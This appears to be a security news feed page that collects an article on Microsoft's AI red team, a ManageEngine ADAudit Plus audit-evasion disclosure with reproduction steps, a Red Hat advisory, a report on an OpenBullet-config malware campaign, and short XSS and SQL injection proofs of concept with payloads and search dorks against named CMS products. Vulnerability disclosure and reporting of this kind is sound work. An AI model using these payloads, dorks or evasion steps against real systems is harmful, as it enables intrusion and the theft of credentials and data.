Since 2018, a dedicated team within Microsoft has attacked machine learning systems to make them safer. But with the public release of new generative AI tools, the field is already evolving.

For most people, the idea of using artificial intelligence tools in daily life—or even just messing around with them—has only become mainstream in recent months, with new releases of generative AI tools from a slew of big tech companies and startups, like OpenAI's ChatGPT and Google's Bard. But behind the scenes, the technology has been proliferating for years, along with questions about how best to evaluate and secure these new AI systems. On Monday, Microsoft is revealing details about the team within the company that since 2018 has been tasked with figuring out how to attack AI platforms to reveal their weaknesses.

In the five years since its formation, Microsoft's AI red team has grown from what was essentially an experiment into a full interdisciplinary team of machine learning experts, cybersecurity researchers, and even social engineers. The group works to communicate its findings within Microsoft and across the tech industry using the traditional parlance of digital security, so the ideas will be accessible rather than requiring specialized AI knowledge that many people and organizations don't yet have. But in truth, the team has concluded that AI security has important conceptual differences from traditional digital defense, which require differences in how the AI red team approaches its work.

“When we started, the question was, ‘What are you fundamentally going to do that’s different? Why do we need an AI red team?’” says Ram Shankar Siva Kumar, the founder of Microsoft's AI red team. “But if you look at AI red teaming as only traditional red teaming, and if you take only the security mindset, that may not be sufficient. We now have to recognize the responsible AI aspect, which is accountability of AI system failures—so generating offensive content, generating ungrounded content. That is the holy grail of AI red teaming. Not just looking at failures of security but also responsible AI failures.”

Shankar Siva Kumar says it took time to bring out this distinction and make the case that the AI red team's mission would really have this dual focus. A lot of the early work related to releasing more traditional security tools like the 2020 Adversarial Machine Learning Threat Matrix, a collaboration between Microsoft, the nonprofit R&D group MITRE, and other researchers. That year, the group also released open source automation tools for AI security testing, known as Microsoft Counterfit. And in 2021, the red team published an additional AI security risk assessment framework.

Over time, though, the AI red team has been able to evolve and expand as the urgency of addressing machine learning flaws and failures becomes more apparent. 

In one early operation, the red team assessed a Microsoft cloud deployment service that had a machine learning component. The team devised a way to launch a denial of service attack on other users of the cloud service by exploiting a flaw that allowed them to craft malicious requests to abuse the machine learning components and strategically create virtual machines, the emulated computer systems used in the cloud. By carefully placing virtual machines in key positions, the red team could launch “noisy neighbor” attacks on other cloud users, where the activity of one customer negatively impacts the performance for another customer.

The red team ultimately built and attacked an offline version of the system to prove that the vulnerabilities existed, rather than risk impacting actual Microsoft customers. But Shankar Siva Kumar says that these findings in the early years removed any doubts or questions about the utility of an AI red team. “That’s where the penny dropped for people,” he says. “They were like, ‘Holy crap, if people can do this, that’s not good for the business.’”

Crucially, the dynamic and multifaceted nature of AI systems means that Microsoft isn't just seeing the most highly resourced attackers targeting AI platforms. “Some of the novel attacks we’re seeing on large language models—it really just takes a teenager with a potty mouth, a casual user with a browser, and we don’t want to discount that,” Shankar Siva Kumar says. “There are APTs, but we also acknowledge that new breed of folks who are able to bring down LLMs and emulate them as well.”

As with any red team, though, Microsoft's AI red team isn't just researching attacks that are being used in the wild right now. Shankar Siva Kumar says that the group is focused on anticipating where attack trends may go next. And that often involves an emphasis on the newer AI accountability piece of the red team's mission. When the group finds a traditional vulnerability in an application or software system, they often collaborate with other groups within Microsoft to get it fixed rather than take the time to fully develop and propose a fix on their own. 

“There are other red teams within Microsoft and other Windows infrastructure experts or whatever we need,” Shankar Siva Kumar says. “The insight for me is that AI red teaming now encompasses not just security failures, but responsible AI failures.”

Microsoft’s AI Red Team Has Already Made the Case for Itself

The event analysis component in Zoho ManageEngine ADAudit Plus 7.1.1 allows an attacker to bypass audit detection by creating or renaming user accounts with a "$" symbol suffix.

While exploring the security aspects of ManageEngine ADAudit Plus I discovered a security vulnerability (CVE-2023-32783) that may have far-reaching implications for other product users.

My findings indicate that ADAudit Plus contains a vulnerability allowing Windows user accounts to remain completely invisible to ADAudit Plus. User accounts leveraging this vulnerability will be undetected by ADAudit Plus, and all audit and security events raised by that user will be missed (i.e., Windows accounts logging in successfully or unsuccessfully). This vulnerability poses a potentially significant risk to organizations relying on ADAudit Plus to perform audit, compliance, and security functions accurately.

Following responsible disclosure guidelines, I secured the CVE but withheld public disclosure of the vulnerability for 90 days, allowing ManageEngine adequate time to address the issue or work with me on a timeline. Unfortunately, despite communication attempts, I could only get them to acknowledge but couldn't get them to provide any updates or collaborate. The 90-day disclosure period has expired, and this CVE is now public.

**Steps to Reproduce**

**1\. Setup:**

*   Install ManageEngine ADAudit Plus (Version: 7.1.1) on a Windows machine designated to monitor Windows Event Log activity for user accounts (e.g., a domain controller or event forwarding server).
    
*   Access the ADAudit Plus portal page at http://localhost:8081.
    
*   Navigate to the Reports section and select "User Logon Activity" (or any other report screen that displays user activities).
    

**2\. Execution:**

*   Carry out actions that trigger the generation of Windows event logs, such as logging into machines using domain accounts, locking screens, attempting logins with incorrect passwords, etc. ADAudit Plus will successfully detect all these activities, as advertised.
    

**3\. Exploit:**

*   Create a new user account on any machine that will generate Windows Event Logs to be observed by ADAudit Plus. Ensure the user account ends with a "$" symbol (e.g., "duser$").
    

*   Log in using this new account (in this example, "duser$") and perform various actions that result in creating Windows Event Logs.
    
*   Observe that the ADAudit Plus portal does not recognize this user, and any actions taken by the user (whether successful or not) do not appear in any of the user or activity reports.
    
*   Note that any user previously observed by ADAudit Plus will become invisible if they rename their user login to end with a '$' symbol.
    

**Threat Vector**

A malicious user, whether internal or external to the org, aware of this vulnerability can create a new or rename an existing user account to have a $ suffix, and then move undetected across different machines and perform different actions that are all undetected by ADAudit Plus.

**Severity: "Medium to High"**

Rated "Medium to High" for the following reasons:

1.  This product is extensively utilized by organizations that depend on its accurate execution of audit, compliance, and security tasks.
    
2.  The simplicity of exploitation
    
3.  The potential impact on an organization's threat detection capabilities, given the possible invisibility of an adversary
    
4.  Suspected Issue and Proposed Solution
    

**Suspected Issue and Proposed Solution**

Windows Event Logs are notoriously challenging to work with, leading to a demand for products that can filter out the noise and extract meaningful information. I suspect the ADAudit Plus code may examine event properties, match the “TargetUserName,” and disregards any entry ending with a "$." and that AD Audit Plus incorrectly assumes that such entries only represent system accounts leading to the vulnerability described. Consequently, a legitimate Windows user account (non-system) would be invisible to the product.

The solution would be to avoid relying on the "$" suffix to identify system accounts to distinguish user accounts from system accounts more accurately.

CVE-2023-32783: ManageEngine ADAudit Plus  (CVE-2023-32783)

Red Hat Security Advisory 2023-4488-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift support for Windows Containers 6.0.1[security update]  
Advisory ID:       RHSA-2023:4488-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4488  
Issue date:        2023-08-07  
CVE Names:         CVE-2020-24736 CVE-2022-27191 CVE-2022-30629  
                   CVE-2022-35252 CVE-2022-36227 CVE-2022-43552  
                   CVE-2023-0361 CVE-2023-1667 CVE-2023-2283  
                   CVE-2023-25173 CVE-2023-26604 CVE-2023-27535  
====================================================================  
1. Summary:

The components for Red Hat OpenShift support for Windows Containers 6.0.1  
are now available. This product release includes bug fixes and security  
update for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)  
* containerd: supplementary groups are not set up properly (CVE-2023-25173)  
* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2174485 - CVE-2023-25173 containerd: Supplementary groups are not set up properly

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10418 - Case sensitivity issue when label "openshift.io/cluster-monitoring" set to 'True' on openshift-windows-machine-config-operator namespace  
OCPBUGS-11831 - oc adm node-logs failing in vSphere CI  
OCPBUGS-15435 - Instance configurations fails on Windows Server 2019 without the container feature  
OCPBUGS-3572 - Check if Windows defender is running doesnt work  
OCPBUGS-4247 - Load balancer shows connectivity outage during Windows nodes upgrade  
OCPBUGS-5894 - Windows nodes do not get drained (deconfigure) during the upgrade process  
OCPBUGS-7726 - WMCO kubelet version not matching OCP payload's one  
OCPBUGS-8055 - containerd version is being misreported  
WINC-818 - Investigate if the Upgradeable condition is being tested in e2e suite  
WINC-823 - Test generated community manifests in WMCO e2e

6. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2022-27191  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-35252  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-43552  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-25173  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27535  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0FTNAAoJENzjgjWX9erECFMQAJK2kwpbtRBzWge5z/BMC5Bh  
vXPuB0Ga9LEbL4y9WrrRATD31Mojhw4Il19Y4fMFo2yw3lRcb1Lleg0OCqCoUwgx  
RIQm7WYmmlRs+tIb8lJAqG03/ih7G71CY9tzIyEwNPcSengxrwUZEl0UCe2r52zX  
JAEZbuK5GVkWql2rqYSxvH8O7VCxPHfwSTxvpB23kbrocUILmIvCt17bRZ8XE1nW  
pbgY+VW4sBXWRCB2kgkwgP4GHJTnOve1Mgyxln1s8MTbVdUC9aNRG2pfZSV2v+42  
VVwT1NX5OgWZTyvJfW878xYGTBoMLJlNGIlRzigwJWxcwwnHnpXbfSg41yE6PBPC  
3IhateHGCGuwQOaUkUUYbNTt+LU4huyM/fvAx1rLJgs0ONTURgLZOJPpgDrNGvSp  
zqf6+iXvgO3CAAKaLCUY2pYchVyOaKPxPiTFLirbH8y2PGbmlEne15qw0i3f5ePC  
V3/evN4L/CMkru8fAw0pp4b8SkZVTxUPub5IgDIA/FGdMLb2VtZJhKFuIzoYdSoQ  
+FC//QoMaouUqMDK9AptuON//3H3Tkk76iIqRFPv6Ve8EHZzgMrY1kaL6A6+a3k1  
Rt/Mr37y98JaonqYt40oIG4Fbtjf/6XIHUnWZMfcZwcTKuaoJfsvCjP5s2CS1d2R  
i9r21xzcEQd8TFmq5CQR  
=Rxx9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4488-01

Social-Commerce version 3.1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Social-Commerce 3.1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 28/07/2023# Vendor: mooSocial# Vendor Homepage: https://moosocial.com/# Software Link: https://social-commerce.moosocial.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4174## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /search/indexGET parameter 'q' is vulnerable to XSShttps://website/search/index?q=[XSS]URL path folder [1,2] is vulnerable to XSShttps://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recenthttps://website/user_info[XSS]/index/friendshttps://website/user_info/index[XSS]/friendshttps://website/faqs[XSS]/index?content_search=https://website/faqs/index[XSS]?content_search=XSS Payloads:j8chn"><img src=a onerror=alert(1)>ridxm[-] Done

Social-Commerce 3.1.6 Cross Site Scripting

A new malware campaign has been observed making use of malicious OpenBullet configuration files to target inexperienced cyber criminals with the goal of delivering a remote access trojan (RAT) capable of stealing sensitive information.
Bot mitigation company Kasada said the activity is designed to "exploit trusted criminal networks," describing it as an instance of advanced threat actors "

A new malware campaign has been observed making use of malicious OpenBullet configuration files to target inexperienced cyber criminals with the goal of delivering a remote access trojan (RAT) capable of stealing sensitive information.

Bot mitigation company Kasada said the activity is designed to "exploit trusted criminal networks," describing it as an instance of advanced threat actors "preying on beginner hackers."

OpenBullet is a legitimate open-source pen testing tool used for automating credential stuffing attacks. It takes in a configuration file that's tailored to a specific website and can combine it with a password list procured through other means to log successful attempts.

"OpenBullet can be used with Puppeteer, which is a headless browser that can be used for automating web interactions," the company said. "This makes it very easy to launch credential stuffing attacks without having to deal with browser windows popping up."

The configurations, essentially a piece of executable code to generate HTTP requests against the target website or web application, are also traded, or sold within criminal communities, lowering the bar for criminal activity and enabling script kiddies to mount their own attacks.

"The interest in the purchase of configs, for example, could indicate that the users of OpenBullet are relatively unsophisticated," Israeli cybersecurity company Cybersixgill noted back in September 2021.

"But it could also be yet another example of the dark web's highly efficient division of labor. That is, threat actors advertise that they want to buy configs because they don't know how to script them, but because it's easier and faster."

This flexibility can also be a double-edged sword, as it opens up a new vector, only it targets other criminal actors who are actively seeking such configuration files on hacking forums.

The campaign discovered by Kasada employs malicious configs shared on a Telegram channel to reach out to a GitHub repository to retrieve a Rust-based dropper called Ocean that's designed to fetch the next-stage payload from the same repository.

The executable, a Python-based malware referred to as Patent, ultimately launches a remote access trojan that utilizes Telegram as a command-and-control (C2) mechanism and issues instructions to capture screenshots, list directory contents, terminate tasks, exfiltrate crypto wallet information, and steal passwords and cookies from Chromium-based web browsers.

Targeted browsers and crypto wallets include Brave, Google Chrome, Microsoft Edge, Opera, Opera GX, Opera Crypto, Yandex Browser, Atomic, Dash Core, Electron Cash, Electrum, Electrum-LTC, Ethereum Wallet, Exodus, Jaxx Liberty, Litecoin Wallet, and Mincoin.

The trojan also functions as a clipper to monitor the clipboard for cryptocurrency wallet addresses and substitute contents matching a predefined regular expression with an actor-controlled address, leading to unauthorized fund transfers.

Two of the Bitcoin wallet addresses operated by the adversary have received a total of $1,703.15 over the past two months, which were subsequently laundered using an anonymous crypto exchange known as Fixed Float.

"The distribution of the malicious OpenBullet configs within Telegram is a novel infection vector, likely targeting these criminal communities due to their frequent use of cryptocurrencies," the researchers said.

"This presents an opportunity for attackers to shape their collection to a specific target group and obtain other members' funds, accounts, or access. As the old saying goes, there is no honor amongst thieves."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Malware Campaign Targets Inexperienced Cyber Criminals with OpenBullet Configs

mooSocial version 3.1.8 suffers from a cross site scripting vulnerability.

    # Exploit Title: mooSocial 3.1.8 - Reflected XSS# Exploit Author: CraCkEr# Date: 28/07/2023# Vendor: mooSocial# Vendor Homepage: https://moosocial.com/# Software Link: https://travel.moosocial.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4173## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsURL path folder is vulnerable to XSShttps://website/classifieds[XSS]/search?category=1https://website/classifieds/search[XSS]?category=1XSS Payloads:ijz3y"><img src=a onerror=alert(1)>y4apk[-] Done

mooSocial 3.1.8 Cross Site Scripting

Adlisting Classified Ads version 2.14.0 suffers from an information leakage vulnerability.

    # Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure# Exploit Author: CraCkEr# Date: 25/07/2023# Vendor: Templatecookie# Vendor Homepage: https://templatecookie.com/# Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script# Tested on: Windows 10 Pro# Impact: Sensitive Information Leakage# CVE: CVE-2023-4168## DescriptionInformation disclosure issue in the redirect responses, When accessing any page on the website,Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.## Steps to Reproduce:When you visit any page on the website, like:https://website/ad-list?category=electronicshttps://website/ad-list-search?page=2https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=in the body page response there's information leakage for +---------------------+google_map_keyapi_keyauth_domainproject_idstorage_bucketmessaging_sender_idapp_idmeasurement_id+---------------------+Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel.Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path:https://website/push-notification (Login as Administrator)[-] Done

Adlisting Classified Ads 2.14.0 Information Disclosure

Datalife Engine version 10 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Datalife Engine v10 (ir) SQl injection Vulnerability                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://datalifeengine.ir/                                                                                          || # Dork      : Powered by DataLife Engine © 2013                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use Pyaload : /index.php?newsid=100 (inject her)[+] cpanl : http://127.0.0.1/datalifeengine/admin.php Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Datalife Engine 10 SQL Injection

Database Compilation CMS version 1.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Database compilation CMS v1.2 XSS Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.2(32-bit)                                             | | # Vendor    : http://mcastel.weebly.com/                                                                                         |  | # Dork      : "Database compilation by Marco Castellani( INAF - Astronomical Observatory of Rome)"                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /table1a.php?sel=<script>alert(/indoushka/);</script>[+] http://127.0.0.1/table1a.php?sel=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Database Compilation 1.2 Cross Site Scripting

Cyber Infinite CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Cyber Infinite cms v1.0 SQL Injection Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 70.0.1(32-bit)                                             | | # Vendor    : http://citsite.com/                                                                                                |  | # Dork      : "Designed & Developed by: Cyber Infinite Technologies"                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] /view-member-detail.php?id=815 <====| inject here[+] /citcp/login.php <====| LoginGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows